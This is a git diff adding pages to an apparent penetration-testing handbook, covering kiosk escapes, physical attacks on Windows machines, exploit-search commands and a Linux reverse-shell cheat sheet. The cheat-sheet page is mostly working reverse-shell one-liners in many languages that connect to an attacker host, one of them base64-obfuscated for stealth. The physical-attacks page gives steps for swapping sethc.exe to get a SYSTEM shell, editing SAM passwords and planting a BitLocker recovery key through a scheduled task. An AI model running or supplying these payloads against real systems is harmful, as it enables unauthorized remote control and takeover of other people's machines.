index 00000000..507f2a52
--- /dev/null
+++ b/physical-attacks/escaping-from-gui-applications/README.md
@@ -0,0 +1,227 @@
+# Escaping from KIOSKs
+
+## Check for possible actions inside the GUI application
+
+* Close/Close as
+* Open/Open with
+* Print
+* Export/Import
+* Search
+* Scan
+
+You should check if you can:
+
+* Modify or create new files
+* Create symbolic links
+* Get access to restricted areas
+* Execute other apps
+
+Maybe using a _Open with_ option you can open a _cmd.exe, command.com, Powershell/Powershell ISE, mmc.exe_
+
+If you can execute something with commands you can execute binaries like _rundll32.exe, at.exe, schtasks.exe, regedit.exe, qwinsta.exe, systeminfo.exe, msinfo32.exe, msconfig.exe, wmic.exe, eventvwr.exe_
+
+## Bypassing path restrictions
+
+* **Environment variables**: There are a lot of environment variables that are pointing to some path
+* **UNC paths**: Paths to connect to shared folders. You should try to connect to the C$ of the local machine \("\\127.0.0.1\c$\Windows\System32"\)
+* **Other protocols**: _about:, data:, ftp:, file:, mailto:, news:, res:, telnet:, view-source:_
+* **Symbolic links**
+* **Shortcuts**: CTRL+N \(open new session\), CTRL+R \(Execute Commands\), CTRL+SHIFT+ESC \(Task Manager\),  Windows+E \(open explorer\), CTRL-B, CTRL-I \(Favourites\), CTRL-H \(History\), CTRL-L, CTRL-O \(File/Open Dialog\), CTRL-P \(Print Dialog\), CTRL-S \(Save As\)
+  * Hidden Administrative menu: CTRL-ALT-F8, CTRL-ESC-F9
+* **Shell URIs**: _shell:Administrative Tools, shell:DocumentsLibrary, shell:Librariesshell:UserProfiles, shell:Personal, shell:SearchHomeFolder, shell:Systemshell:NetworkPlacesFolder, shell:SendTo, shell:UsersProfiles, shell:Common Administrative Tools, shell:MyComputerFolder, shell:InternetFolder_
+
+## Download Binaries
+
+Console: [https://sourceforge.net/projects/console/](https://sourceforge.net/projects/console/)  
+Explorer: [https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/](https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/)  
+Registry editor: [https://sourceforge.net/projects/uberregedit/](https://sourceforge.net/projects/uberregedit/)
+
+## Accessing filesytem from the browser
+
+### Windows
+
+| File:/C:/windows | File:/C:/windows/ | File:/C:/windows\ | File:/C:\windows |
+| :--- | :--- | :--- | :--- |
+| File:/C:\windows\ | File:/C:\windows/ | File://C:/windows | File://C:/windows/ |
+| File://C:/windows\ | File://C:\windows | File://C:\windows/ | File://C:\windows\ |
+| C:/windows | C:/windows/ | C:/windows\ | C:\windows |
+| C:\windows\ | C:\windows/ | %WINDIR% | %TMP% |
+| %TEMP% | %SYSTEMDRIVE% | %SYSTEMROOT% | %APPDATA% |
+| %HOMEDRIVE% | %HOMESHARE |  |   |
+
+## Abusing Common Dialogs
+
+**Common Dialogs** are those options of **saving a file**, **opening a file**, selecting a font, a color... Most of them will **offer a full Explorer functionality**. This means that you will be able to access Explorer functionalities if you can access these options.
+
+## Browsers tricks
+
+Backup iKat versions:
+
+[http://swin.es/k/](http://swin.es/k/)  
+[http://www.ikat.kronicd.net/](http://www.ikat.kronicd.net/)  
+
+
+## Internet Explorer Tricks
+
+### 'Image Toolbar'
+
+It's a toolbar that appears on the top-left of image when it's clicked. You will be able to Save, Print, Mailto, Open "My Pictures" in Explorer. The Kiosk needs to be using Internet Explorer.
+
+### Shell Protocol
+
+Type this URLs to obtain an Explorer view:
+
+* `Shell:Profile`
+* `Shell:ProgramFiles`
+* `Shell:System`
+* `Shell:ControlPanelFolder`
+* `Shell:Windows`
+* `shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}` --&gt; Control Panel
+* `shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}` --&gt; My Computer
+* `shell:::{{208D2C60-3AEA-1069-A2D7-08002B30309D}}` --&gt; My Network Places
+* `shell:::{871C5380-42A0-1069-A2EA-08002B30309D}` --&gt; Internet Explorer
+
+## iPad
+
+### Gestures and bottoms
+
+#### Swipe up with four \(or five\) fingers / Double-tap Home button
+
+To view the multitask view and change App
+
+#### Swipe one way or another with four or five fingers
+
+In order to change to the next/last App
+
+#### Pinch the screen with five fingers / Touch Home button / Swipe up with 1 finger from the bottom of the screen in a quick motion to the up
+
+To access Home
+
+#### Swipe one finger from the bottom of the screen just 1-2 inches \(slow\)
+
+The dock will appear
+
+#### Swipe down from the top of the display with 1 finger
+
+To view your notifications
+
+#### Swipe down with 1 finger the top-right corner of the screen
+
+To see iPad Pro's control centre
+
+#### Swipe 1 finger from the left of the screen 1-2 inches
+
+To see Today view
+
+#### Swipe fast 1 finger from the centre of the screen to the right or left
+
+To change to next/last App
+
+#### Press and hold the On/**Off**/Sleep button at the upper-right corner of the **iPad +**  Move the Slide to **power off** slider all the way to the right,
+
+To power off
+
+#### Press the  On/**Off**/Sleep button at the upper-right corner of the **iPad and the Home button for a few second**
+
+To force a hard power off
+
+#### Press the  On/**Off**/Sleep button at the upper-right corner of the **iPad and the Home button quickly**
+
+To take a screenshot that will pop up in the lower left of the display. Press both buttons at the same time very briefly as if you hold them a few seconds a hard power off will be performed.
+
+### Shortcuts
+
+You should have an iPad keyboard or a USB keyboard adaptor. Only shortcuts that could help escaping from the application will be shown here.
+
+| Key | Name |
+| :--- | :--- |
+| ⌘ | Command |
+| ⌥ | Option \(Alt\) |
+| ⇧ | Shift |
+| ↩ | Return |
+| ⇥ | Tab |
+| ^ | Control |
+| ← | Left Arrow |
+| → | Right Arrow |
+| ↑ | Up Arrow |
+| ↓ | Down Arrow |
+
+#### System shortcuts
+
+These shortcuts are for the visual settings and sound settings, depending on the use of the iPad.
+
+| Shortcut | Action |
+| :--- | :--- |
+| F1 | Dim Sscreen |
+| F2 | Brighten screen |
+| F7 | Back one song |
+| F8 | Play/pause |
+| F9 | Skip song |
+| F10 | Mute |
+| F11 | Decrease volume |
+| F12 | Increase volume |
+| ⌘ Space | Display a list of available languages; to choose one, tap the space bar again. |
+
+#### iPad navigation
+
+| Shortcut | Action |
+| :--- | :--- |
+| ⌘H | Go to Home |
+| ⌘⇧H \(Command-Shift-H\) | Go to Home |
+| ⌘ \(Space\) | Open Spotlight |
+| ⌘⇥ \(Command-Tab\) | List last ten used apps |
+| ⌘~ | Go t the last App |
+| ⌘⇧3 \(Command-Shift-3\) | Screenshot \(hovers in bottom left to save or act on it\) |
+| ⌘⇧4 | Screenshot and open it in the editor |
+| Press and hold ⌘ | List of shortcuts available for the App |
+| ⌘⌥D \(Command-Option/Alt-D\) | Brings up the dock |
+| ^⌥H \(Control-Option-H\) | Home button |
+| ^⌥H H \(Control-Option-H-H\) | Show multitask bar |
+| ^⌥I \(Control-Option-i\) | Item chooser |
+| Escape | Back button |
+| → \(Right arrow\) | Next item |
+| ← \(Left arrow\) | Previous item |
+| ↑↓ \(Up arrow, Down arrow\) | Simultaneously tap selected item |
+| ⌥ ↓ \(Option-Down arrow\) | Scroll down |
+| ⌥↑ \(Option-Up arrow\) | Scroll up |
+| ⌥← or ⌥→ \(Option-Left arrow or Option-Right arrow\) | Scroll left or right |
+| ^⌥S \(Control-Option-S\) | Turn VoiceOver speech on or off |
+| ⌘⇧⇥ \(Command-Shift-Tab\) | Switch to the previous app |
+| ⌘⇥ \(Command-Tab\) | Switch back to the original app |
+| ←+→, then Option + ← or Option+→ | Navigate through Dock |
+
+#### Safari shortcuts
+
+| Shortcut | Action |
+| :--- | :--- |
+| ⌘L \(Command-L\) | Open Location |
+| ⌘T | Open a new tab |
+| ⌘W | Close the current tab |
+| ⌘R | Refresh the current tab |
+| ⌘. | Stop loading the current tab |
+| ^⇥ | Switch to the next tab |
+| ^⇧⇥ \(Control-Shift-Tab\) | Move to the previous tab |
+| ⌘L | Select the text input/URL field to modify it |
+| ⌘⇧T \(Command-Shift-T\) | Open last closed tab \(can be used several times\) |
+| ⌘\[ | Goes back one page in your browsing history |
+| ⌘\] | Goes forward one page in your browsing history |
+| ⌘⇧R | Activate Reader Mode |
+
+#### Mail shortcuts
+
+| Shortcut | Action |
+| :--- | :--- |
+| ⌘L | Open Location |
+| ⌘T | Open a new tab |
+| ⌘W | Close the current tab |
+| ⌘R | Refresh the current tab |
+| ⌘. | Stop loading the current tab |
+| ⌘⌥F \(Command-Option/Alt-F\) | Search in your mailbox |
+
+### References
+
+* [https://www.macworld.com/article/2975857/6-only-for-ipad-gestures-you-need-to-know.html](https://www.macworld.com/article/2975857/6-only-for-ipad-gestures-you-need-to-know.html)
+* [https://www.tomsguide.com/us/ipad-shortcuts,news-18205.html](https://www.tomsguide.com/us/ipad-shortcuts,news-18205.html)
+* [https://thesweetsetup.com/best-ipad-keyboard-shortcuts/](https://thesweetsetup.com/best-ipad-keyboard-shortcuts/)
+* [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html)
+
diff --git a/physical-attacks/escaping-from-gui-applications/show-file-extensions.md b/physical-attacks/escaping-from-gui-applications/show-file-extensions.md
new file mode 100644
index 00000000..42bc0ebd
--- /dev/null
+++ b/physical-attacks/escaping-from-gui-applications/show-file-extensions.md
@@ -0,0 +1,46 @@
+# Show file extensions
+
+### How to Show File Extensions in Windows XP
+
+1. Open Windows Explorer. You can do this by clicking "My Computer" from the Start Menu. Note that this is NOT the same thing as Internet Explorer.
+2. Click the "Tools" menu on the menu bar in Explorer \(the menu bar is at the top of the Explorer window, underneath the window title\). Click the "Folder Options" item in the popup menu that appears.
+3. A dialog box appears. Click the "View" tab at the top of the window.
+4. Look for a setting "Hide file extensions for known file types" and uncheck the box beside it to disable it.
+5. Click the button "Apply to All Folders". Then click "Apply" and then "OK".
+
+### Displaying the File Extension in Windows Vista and Windows 7
+
+1. Click the Start menu. This is the round icon that is on the bottom left corner of your screen.
+2. Type "folder options" \(without the quotes\). Click the line "Folder Options" that appears at the top of the Start menu.
+3. A dialog box with the title "Folder Options" will appear. Click the "View" tab at the top of the window.
+4. Click to uncheck the box for "Hide extensions for known file types".
+5. Click the "OK" button at the bottom of the dialog box.
+
+### How to Show File Extensions in Windows 8
+
+1. Invoke the start screen. One way to do this is to move your mouse to the bottom left corner of your screen. In Windows 8, there's no indication that this will cause the start screen to appear, but it will.
+2. Type "folder options" \(without the quotes\). I know that there is no blank field in the start screen to suggest that you can actually type anything. Like many things in Windows 8, arcane knowledge is needed to operate the system.
+3. On the left side of the screen, you will get the disappointing message "No apps match your search". The start screen search facility in Windows 8 can only find something for you if you already know where to find it and can tell it where it is.
+
+   Click the line "Settings" on the right side of the screen.
+
+4. The left side of the screen now shows "Folder Options" as one of the possible results. Click it.
+5. A window with the title "Folder Options" will appear. Click the "View" tab at the top of that dialog box.
+6. Look for the line "Hide extensions of known file types" and click the box beside it to remove the tick.
+7. Click the "OK" button.
+
+### How to Show File Extensions in Windows 10
+
+1. Click the icon on the task bar at the bottom of the screen to invoke the Start menu. \(The icon is the one that looks like a white version of the Windows logo.\)
+2. Type "folder options" \(without the quotation marks\). There is no blank field on the screen to suggest that you can type anything, but you can. Just type it.
+3. Click the "File Explorer Options" item that appears in the "Best match" list that appears.
+4. A dialog box with the title "File Explorer Options" will appear. Click the "View" tab at the top of the window.
+5. Scroll to find the item "Hide extensions for known file types" and click the box next to it to remove the tick.
+6. Click the "OK" button.
+
+That's it. You should now be able to see the true extensions of the files in your Explorer windows.
+
+Copyright © 2008-2018 by Christopher Heng. All rights reserved. Get more "How To" guides and tutorials from [https://www.howtohaven.com/](https://www.howtohaven.com/).
+
+**This article can be found at** [**https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml**](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml)\*\*\*\*
+
diff --git a/physical-attacks/physical-attacks.md b/physical-attacks/physical-attacks.md
new file mode 100644
index 00000000..add974a2
--- /dev/null
+++ b/physical-attacks/physical-attacks.md
@@ -0,0 +1,138 @@
+# Physical Attacks
+
+## BIOS password
+
+### The battery
+
+Most of the **motherbords** have a **battery**. I you **remove** it **30min** the settings of the BIOS will be **restarted** \(password included\).
+
+### Jumper CMOS
+
+Most of the **motherboards** have a **jumper** that can restart the settings. This jumper connects a central pin with another, if you **connect thoses pins the motherbord will be reseted**.
+
+### Live Tools
+
+If you could **run** for example a **Kali** Linux from a Live CD/USB you could use tools like _**killCmos**_ or _**CmosPWD**_ \(this last one is included in Kali\) you could try to **recover the password of the BIOS**.
+
+### Online BIOS password recovery
+
+Put the password of the BIOS **3 times wrong**, then the BIOS will **show an error messag**e and it will be blocked.   
+Visit the page [https://bios-pw.org](https://bios-pw.org) and **introduce the error code** shown by the BIOS and you could be lucky and get a **valid password** \(the **same search could show you different passwords and more than 1 could be valid**\).
+
+## UEFI
+
+To check the settings of the UEFI and perform some kind of attack you should try [chipsec](https://github.com/chipsec/chipsec/blob/master/chipsec-manual.pdf).  
+Using this tool you could easily disable the Secure Boot:
+
+```text
+python chipsec_main.py -module exploits.secure.boot.pk
+```
+
+## RAM
+
+### Cold boot
+
+The **RAM memory is persistent from 1 to 2 minutes** from the time the computer is powered off. If you apply **cold** \(liquid nitrogen, for example\) on the memory card you can extend this time up to **10 minutes**.
+
+Then, you can do a **memory dump** \(using tools like dd.exe, mdd.exe, Memoryze, win32dd.exe or DumpIt\) to analyze the memory.
+
+You should **analyze** the memory **using volatility**.
+
+### [INCEPTION](https://github.com/carmaa/inception)
+
+Inception is a **physical memory manipulation** and hacking tool exploiting PCI-based DMA. The tool can attack over **FireWire**, **Thunderbolt**, **ExpressCard**, PC Card and any other PCI/PCIe HW interfaces.  
+**Connect** your computer to the victim computer over one of those **interfaces** and **INCEPTION** will try to **patch** the **pyshical memory** to give you **access**.
+
+**If INCEPTION succeeds, any password introduced will be vaid.**
+
+**It doesn't work with Wndows10.**
+
+## Live CD/USB
+
+### Sticky Keys and more
+
+* **SETHC:** _sethc.exe_ is invoked when SHIFT is pressed 5 times
+* **UTILMAN:** _Utilman.exe_ is invoked by pressing WINDOWS+U
+* **OSK:** _osk.exe_ is invoked by pressing WINDOWS+U, then launching the on-screen keyboard
+* **DISP:** _DisplaySwitch.exe_ is invoked by pressing WINDOWS+P
+
+These binaries are located inside _**C:\Windows\System32**_. You can **change** any of them for a **copy** of the binary **cmd.exe** \(also in the same folder\) and any time that you invoke any of those binaries a command prompt as **SYSTEM** will appear.
+
+### Modifying SAM
+
+You can use the tool _**chntpw**_ to **modify the** _**SAM**_ **file** of a mounted Windows filesystem. Then, you could change the password of the Administrator user, for example.  
+This tool is available in KALI.
+
+```text
+chntpw -h
+chntpw -l <path_to_SAM>
+```
+
+**Inside a Linux system you could modify the** _**/etc/shadow**_ **or** _**/etc/passwd**_ **file.**
+
+### **Kon-Boot**
+
+**Kon-Boot** is one of the best tools around which can log you into Windows without knowing the password. It works by **hooking into the system BIOS and temporarily changing the contents of the Windows kernel** while booting \(new versions work also with **UEFI**\). It then allows you to enter **anything as the password** during login. The next time you start the computer without Kon-Boot, the original password will be back, the temporary changes will be discarded and the system will behave as if nothing has happened.  
+Read More: [https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/)
+
+It is a live CD/USB that can **patch the memory** so you **won't need to know the password to login**.  
+Kon-Boot also performs the **StickyKeys** trick so you could press _**Shift**_ **5 times to get an Administrator cmd**.
+
+## **Running Windows**
+
+### Initial shortcuts
+
+### Booting shortcuts
+
+* supr - BIOS
+* f8 - Recovery mode
+* _supr_ - BIOS ini
+* _f8_ - Recovery mode
+* _Shitf_ \(after the windows banner\) - Go to login page instead of autologon \(avoid autologon\)
+
+### **BAD USBs**
+
+#### **Rubber Ducky tutorials**
+
+* [Tutorial 1](https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Tutorials)
+* [Tutorial 2](https://blog.hartleybrody.com/rubber-ducky-guide/)
+
+#### **Teensyduino**
+
+* [Payloads and tutorials](https://github.com/Screetsec/Pateensy)
+
+There are also tons of tutorials about **how to create your own bad USB**.
+
+### Volume Shadow Copy
+
+With administrators privileges and powershell you could make a copy of the SAM file.[ See this code](../windows/basic-powershell-for-pentesters/#volume-shadow-copy).
+
+## Bypassing Bitlocker
+
+Bitlocker uses **2 passwords**. The one used by the **user**, and the **recovery** password \(48 digits\).
+
+If you are lucky and inside the current session of Windows exists the file _**C:\Windows\MEMORY.DMP**_ \(It is a memory dump\) you could try to **search inside of it the recovery password**. You can **get this file** and a **copy of the filesytem** and then use _Elcomsoft Forensic Disk Dercyptor_ to get the content \(this will only work if the password is inside the memory dump\).  
+You coud also **force the memory dump** using _**NotMyFault**_ of _Sysinternals,_ but this will reboot the system and has to be executed as Administrator.
+
+You could also try a **bruteforce attack** using _**Passware Kit Forensic**_.
+
+### Social Engineering
+
+Finally, you could make the user add a new recovery password making him executed as administrator:
+
+```bash
+schtasks /create /SC ONLOGON /tr "c:/windows/system32/manage-bde.exe -protectors -add c: -rp 000000-000000-000000-000000-000000-000000-000000-000000" /tn tarea /RU SYSTEM /f
+```
+
+This will add a new recovery key \(composed of 48 zeros\) in the next login.
+
+To check the valid recovery keys you can execute:
+
+```text
+manage-bde -protectors -get c:
+```
+
+
+
+
+
diff --git a/search-exploits.md b/search-exploits.md
new file mode 100644
index 00000000..2741034b
--- /dev/null
+++ b/search-exploits.md
@@ -0,0 +1,40 @@
+# Search Exploits
+
+### Browser
+
+Always search in "google" or others: **&lt;service\_name&gt; \[version\] exploit**
+
+You should also try the **shodan** **exploit search** from [https://exploits.shodan.io/](https://exploits.shodan.io/).
+
+### Searchsploit
+
+Useful to search exploits for services in **exploitdb from the console.**
+
+```bash
+#Searchsploit tricks
+searchsploit "linux Kernel" #Example
+searchsploit apache mod_ssl #Other example
+searchsploit -m 7618 #Paste the exploit in current directory
+searchsploit -p 7618[.c] #Show complete path
+searchsploit -x 7618[.c] #Open vi to inspect the exploit
+searchsploit --nmap file.xml #Search vulns inside an nmap xml result
+```
+
+### MSF-Search
+
+```bash
+msf> search platform:windows port:135 target:XP type:exploit
+```
+
+### PacketStorm
+
+If nothing is found, try to search the used technology inside [https://packetstormsecurity.com/](https://packetstormsecurity.com/)
+
+### Vulners
+
+You can also search in vulners database: [https://vulners.com/](https://vulners.com/)
+
+### Sploitus
+
+This search exploits in other databases: [https://sploitus.com/](https://sploitus.com/)
+
diff --git a/shells/shells/README.md b/shells/shells/README.md
new file mode 100644
index 00000000..6c05fdb9
--- /dev/null
+++ b/shells/shells/README.md
@@ -0,0 +1,15 @@
+# Shells \(Linux, Windows, MSFVenom\)
+
+### \*\*\*\*[**Shells - Linux**](linux.md)\*\*\*\*
+
+### [**Shells - Windows**](windows.md)
+
+### \*\*\*\*[**MSFVenom - CheatSheet**](untitled.md)
+
+### **Auto-generated shells**
+
+* \*\*\*\*[**https://github.com/t0thkr1s/revshellgen**](https://github.com/t0thkr1s/revshellgen)\*\*\*\*
+* \*\*\*\*[**https://github.com/mthbernardes/rsg**](https://github.com/mthbernardes/rsg)\*\*\*\*
+
+### \*\*\*\*
+
diff --git a/shells/shells/linux.md b/shells/shells/linux.md
new file mode 100644
index 00000000..55f99e98
--- /dev/null
+++ b/shells/shells/linux.md
@@ -0,0 +1,292 @@
+# Shells - Linux
+
+## Bash \| sh
+
+```bash
+bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1
+sh -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP
+0<&196;exec 196<>/dev/tcp/<ATTACKER-IP>/<PORT>; sh <&196 >&196 2>&196
+exec 5<>/dev/tcp/<ATTACKER-IP>/<PORT>; while read line 0<&5; do $line 2>&5 >&5; done
+```
+
+```bash
+#If you need a more stable connection do:
+nohup bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'
+
+#Stealthier method
+#B64 encode the shell like: echo "nohup bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0
+echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null
+
+```
+
+## Netcat
+
+```bash
+nc -e /bin/sh <ATTACKER-IP> <PORT>
+nc <ATTACKER-IP> <PORT> | /bin/sh #Blind
+rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER-IP> <PORT> >/tmp/f
+nc <ATTACKER-IP> <PORT1>| /bin/bash | nc <ATTACKER-IP> <PORT2>
+rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | nc <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
+```
+
+## Telnet
+
+```bash
+telnet <ATTACKER-IP> <PORT> | /bin/sh #Blind
+rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet <ATTACKER-IP> <PORT> >/tmp/f
+telnet <ATTACKER-IP> <PORT> | /bin/bash | telnet <ATTACKER-IP> <PORT>
+rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | telnet <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
+```
+
+## Whois
+
+**Attacker**
+
+```bash
+while true; do nc -l <port>; done
+```
+
+To send the command write it down, press enter and press CTRL+D \(to stop STDIN\)
+
+**Victim**
+
+```bash
+export X=Connected; while true; do X=`eval $(whois -h <IP> -p <Port> "Output: $X")`; sleep 1; done
+```
+
+## Python
+
+```bash
+#Linux
+export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
+python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
+#IPv6
+python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");' 
+```
+
+## Full TTY
+
+Note that the shell you set in the `SHELL` variable **must** be **listed inside** _**/etc/shells**_ or `The value for the SHELL variable was not found the /etc/shells file   
+This incident has been reported`.
+
+```bash
+python -c 'import pty; pty.spawn("/bin/bash")'
+(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
+```
+
+```bash
+script -qc /bin/bash /dev/null
+(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; 
+```
+
+## Perl
+
+```bash
+perl -e 'use Socket;$i="<ATTACKER-IP>";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
+perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
+```
+
+## Ruby
+
+```bash
+ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
+ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
+```
+
+## PHP
+
+```bash
+php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
+```
+
+## Java
+
+```bash
+r = Runtime.getRuntime()
+p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
+p.waitFor()
+```
+
+## Ncat
+
+```bash
+victim> ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl
+attacker> ncat -v 10.0.0.22 4444 --ssl
+```
+
+## Golang
+
+```bash
+echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
+```
+
+## Lua
+
+```bash
+#Linux
+lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
+#Windows & Linux
+lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
+```
+
+## NodeJS
+
+```javascript
+(function(){
+    var net = require("net"),
+        cp = require("child_process"),
+        sh = cp.spawn("/bin/sh", []);
+    var client = new net.Socket();
+    client.connect(8080, "10.17.26.64", function(){
+        client.pipe(sh.stdin);
+        sh.stdout.pipe(client);
+        sh.stderr.pipe(client);
+    });
+    return /a/; // Prevents the Node.js application form crashing
+})();
+
+
+or
+
+require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
+
+or
+
+-var x = global.process.mainModule.require
+-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')
+
+or
+
+https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
+```
+
+## OpenSSH
+
+Attacker \(Kali\)
+
+```bash
+openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
+openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
+openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
+```
+
+Victim
+
+```bash
+#Linux
+openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
+
+#Windows
+openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
+```
+
+## **Socat**
+
+[https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries)
+
+### Bind shell
+
+```bash
+victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
+attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337 
+```
+
+### Reverse shell
+
+```bash
+attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
+victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
+```
+
+## Awk
+
+```bash
+awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
+```
+
+## Finger
+
+**Attacker**
+
+```bash
+while true; do nc -l 79; done
+```
+
+To send the command write it down, press enter and press CTRL+D \(to stop STDIN\)
+
+**Victim**
+
+```bash
+export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null')`; sleep 1; done
+
+export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done
+```
+
+## Gawk
+
+```bash
+#!/usr/bin/gawk -f
+
+BEGIN {
+        Port    =       8080
+        Prompt  =       "bkd> "
+
+        Service = "/inet/tcp/" Port "/0/0"
+        while (1) {
+                do {
+                        printf Prompt |& Service
+                        Service |& getline cmd
+                        if (cmd) {
+                                while ((cmd |& getline) > 0)
+                                        print $0 |& Service
+                                close(cmd)
+                        }
+                } while (cmd != "exit")
+                close(Service)
+        }
+}
+```
+
+## Xterm
+
+One of the simplest forms of reverse shell is an xterm session.  The following command should be run on the server.  It will try to connect back to you \(10.0.0.1\) on TCP port 6001.
+
+```bash
+xterm -display 10.0.0.1:1
+```
+
+To catch the incoming xterm, start an X-Server \(:1 – which listens on TCP port 6001\).  One way to do this is with Xnest \(to be run on your system\):
+
+```bash
+Xnest :1
+```
+
+You’ll need to authorise the target to connect to you \(command also run on your host\):
+
+```bash
+xhost +targetip
+```
+
+## Groovy
+
+by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) NOTE: Java reverse shell also work for Groovy
+
+```bash
+String host="localhost";
+int port=8044;
+String cmd="cmd.exe";
+Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
+```
+
+## Bibliography
+
+{% embed url="https://highon.coffee/blog/reverse-shell-cheat-sheet/" %}
+
+{% embed url="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell" %}
+
+{% embed url="https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/" %}
+
+{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" %}
+
+
+
